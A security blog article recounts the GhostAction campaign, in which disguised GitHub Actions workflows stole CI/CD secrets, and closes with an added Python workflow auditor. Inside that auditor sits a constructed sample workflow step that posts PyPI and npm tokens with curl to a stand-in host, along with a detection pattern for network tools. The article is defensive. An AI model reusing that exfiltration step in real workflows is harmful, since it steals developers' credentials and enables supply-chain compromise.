The GhostAction Attack: How 3,300+ Secrets Were Stolen from GitHub Repositories
A large-scale campaign abused GitHub Actions to exfiltrate 3,325 secrets from 817 repositories and 327 users. Learn how it worked and how to secure CI/CD pipelines.
The GitHub ecosystem was recently hit by one of its largest compromises in years: the GhostAction attack. This sophisticated campaign, uncovered by researchers at GitGuardian, highlights a critical vulnerability that many development teams overlook—the security of their CI/CD pipelines.
Here’s a breakdown of what happened and what your team needs to know.
What Was the GhostAction Attack?
Attackers launched a large-scale campaign to inject malicious GitHub Actions workflows into hundreds of repositories. By disguising their code as routine security updates, they tricked users into running scripts that exfiltrated sensitive secrets from their development environments.
The scale of the breach is staggering:
- 3,325 secrets were compromised.
- 817 repositories were affected.
- 327 users had their credentials stolen.
The stolen secrets included high-value tokens for PyPI, npm, and Docker Hub, as well as keys for cloud services like AWS and Cloudflare.
How Did the Attack Work?
The investigation began with an incident in the FastUUID project. An attacker, using the alias "Grommash9," submitted a pull request with the description “Add Github Actions Security workflow.”
Instead of improving security, the workflow contained a malicious script. When triggered by a push or manual run, it extracted secrets from the CI/CD environment and sent them via an HTTP request to a remote server controlled by the attacker. To avoid suspicion, the script included harmless-sounding commands like “Prepare Cache Busting,” but its true purpose was data theft.
Although the project maintainers and PyPI responded quickly—revoking the commit and placing the project in read-only mode—the investigation revealed this was just one piece of a much larger puzzle. The same attacker had injected identical workflows into hundreds of other public and private repositories.
The Real Danger: A Supply-Chain Nightmare Averted
The most significant threat was the potential for a massive supply-chain attack. With stolen tokens for npm, PyPI, and Docker Hub, attackers could have published malicious versions of popular packages and container images. Anyone who downloaded these compromised dependencies would have been infected.
While a large-scale malicious release was prevented this time, the active use of some stolen credentials has already been confirmed, including AWS keys and database passwords.
The Key Takeaway for Developers and Security Teams
The GhostAction attack proves that CI/CD pipelines are a primary target for attackers. They are no longer just build tools; they are powerful environments with access to your most valuable secrets.
This incident shows that attackers are becoming more sophisticated. They analyze legitimate workflows to identify the names of secrets used, then create fake scripts to steal those exact credentials.
How to Protect Your Organization
- Audit Your Workflows: Treat your .github/workflows files with the same scrutiny as your application source code.
- Scrutinize Pull Requests: Be wary of pull requests from unknown contributors, especially those modifying CI/CD configurations.
- Implement Secret Scanning: Proactively scan your repositories and CI/CD logs for exposed credentials. Don’t wait for a breach to find out you’ve been compromised.
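As an added illustration of the "Audit Your Workflows" step (example code written for this page, not code from the original article or from GitGuardian), the script below flags workflow files that combine the traits described above: several secret references, a shell step that calls a network tool against a host outside an allow-list, and a manual trigger. Both workflow strings are constructed samples; the trusted-host set and the three-secret threshold are assumptions to tune for your organisation.

```python
import re
# Constructed sample in the style of the GhostAction workflow: a harmless-sounding step
# maps several repository secrets into env and ships them off-host with curl.
SUSPICIOUS = """\
on: [push, workflow_dispatch]
jobs:
  security:
    steps:
      - name: Prepare Cache Busting
        env:
          PYPI_TOKEN: ${{ secrets.PYPI_API_TOKEN }}
          NPM_TOKEN: ${{ secrets.NPM_TOKEN }}
          AWS_KEY: ${{ secrets.AWS_SECRET_ACCESS_KEY }}
        run: |
          echo "cache busting"
          curl -s -X POST https://collector.invalid/upload -d "$PYPI_TOKEN,$NPM_TOKEN"
"""
# Constructed benign publish workflow: one secret passed to a pinned action, no shell networking.
BENIGN = """\
on: release
jobs:
  publish:
    steps:
      - uses: pypa/gh-action-pypi-publish@release/v1
        with:
          password: ${{ secrets.PYPI_API_TOKEN }}
"""
SECRET_REF = re.compile(r"\$\{\{\s*secrets\.(\w+)\s*\}\}")
NET_TOOL = re.compile(r"\b(curl|wget|nc|ncat)\b")
HOST = re.compile(r"https?://([\w.-]+)")
TRUSTED_HOSTS = {"github.com", "api.github.com"}  # assumption: extend for your organisation
# A `run:` step plus every following line indented deeper than it (covers `run: |` blocks).
RUN_BLOCK = re.compile(r"^([ \t]*)run:[ \t]*\|?(.*(?:\n(?:\1[ \t]+\S.*|[ \t]*(?=\n)))*)", re.M)

def audit_workflow(text):
    """Return the distinct secrets a workflow references, a list of findings and a risk level."""
    secrets = sorted(set(SECRET_REF.findall(text)))
    findings = []
    for m in RUN_BLOCK.finditer(text):  # inspect each shell step separately, not `uses:` actions
        if NET_TOOL.search(m.group(2)):  # secrets staged via env: are typically shipped with curl/wget
            hosts = [h for h in HOST.findall(m.group(2)) if h not in TRUSTED_HOSTS]
            findings.append(f"run step calls a network tool; untrusted hosts: {hosts}")
    if len(secrets) >= 3:
        findings.append(f"references {len(secrets)} distinct secrets")
    if "workflow_dispatch" in text:
        findings.append("can be triggered manually via workflow_dispatch")
    exfil = bool(secrets) and any(f.startswith("run step") for f in findings)
    risk = "high" if exfil else "medium" if findings else "low"
    return {"secrets": secrets, "findings": findings, "risk": risk}
```

Run it over every file under .github/workflows in a pull request and require a human review for anything rated medium or high.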
The GhostAction attack is a wake-up call. Securing your CI/CD pipeline isn’t just a best practice—it’s essential for protecting your code, your customers, and your company.